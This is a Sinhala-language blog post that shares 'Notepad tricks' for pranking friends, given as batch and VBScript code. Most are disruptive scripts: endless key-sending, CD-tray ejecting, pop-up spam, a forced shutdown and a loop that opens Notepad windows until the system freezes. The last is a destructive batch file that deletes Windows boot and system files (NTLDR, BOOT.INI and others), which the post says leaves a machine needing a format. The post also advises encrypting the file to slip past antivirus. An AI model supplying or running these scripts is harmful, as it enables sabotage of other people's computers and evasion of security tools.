Email



ඔන්න කස්ටියට මම ගෙනාවා Notepad tricks ටිකක්.....මේවත් ඉතින් යාලුවො අන්දන්න පාවිච්චි කරන්න බැරිකමක් නෑ....:D

1. Matrix Effect එකක්.....

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (matrix.bat වගේ)
@echo off
color 02
:techtrickslanka.blogspot.com
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto techtrickslanka.blogspot.com
 
2. මේ script එක open කලාම Computer එක පිස්සු නටන්න ගන්නවා...

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (virus.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "techtrickslanka.blogspot.com"
loop




 3. මෙකෙන් වෙන්නෙ CD/DVD drive එක ඉවරයක් නැතුව ඇරෙන්නයි වැහෙන්නයි ගන්න එක.

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (virus.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

4. මේක නම් අම්බානෙට තදවෙන seen එකක්. එකදිගටම මේ පහල තියෙන message ටික එන්න පටන් ගන්නවා.වැඩේ නවත්තගන්න ඕනිනම් computer එක restart කරන්න වෙයි.....

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (message.bat වගේ)

@ECHO off
:Begin
msg * Hi
msg * Go to techtrickslanka.blogspot.com
msg * Please.......
msg * Go................. !
GOTO BEGIN

5.  මේ code එකෙන් පුලුවන් message එකක් එක්ක computer එක shutdown කරල දාන්න.

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (down.bat වගේ)

@echo off
msg * techtrickslanka.blogspot.com.
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeeeeeee” -s

6. මෙකෙන් වෙන්නේ notepad එකේ word එකේ එහෙම හැමතිස්සෙම  techtrickslanka.blogspot.com (ඔයාලා මෙතනට දෙන message එක) කියලා type වෙන්න ගන්නවා....

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (word.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.


Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “techtrickslanka.blogspot.com.
loop

7.  මේකෙන් වෙන්නෙ computer එක හිරවෙන තරමට notepad windows එකදිගට open වෙන එක.........


පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (notepad.bat වගේ)


@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top

8. අම්මෝ දැන්නම් අතත් රිදෙනවා type කරලම. තව  Notepad tricks ගොඩක් තියෙනවා මම ඒවා පස්සෙ දාන්නම් කවනම් type කරන්න බැරියෝ.......ඔන්න අන්තිමට හොදම එකක් දීලා යන්නම්කෝ..මේකෙන් පුලුවන් ඉතින් computer එකක් format කරල මිසක් ආයෙ ගොඩදාන්න බැරි විදියට අවුල් කරල දාන්න. නිකං කහනව කහනව වගේනම් ඉතින් තමන්ගෙ computer එකේම run කරල බැලුවත් අවුලක් නෑ..:D

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මොකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (down.bat වගේ)


@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

වයිරස් ගාඩ් වලින් අල්ලනවනම් file එක crypt කරලා යවන්න...crypt කරන හැටි දන්නෙ නැති අයට පස්සෙ දවසක ඒ ගැන කියලා දෙන්නම්...


එහෙනම් ඉතින් මම යනවා... Post එක කොහොමද කියලා අදහසකුත් දාන්න.......
තවත් එකක් නොව සියල්ලටම එකක්.....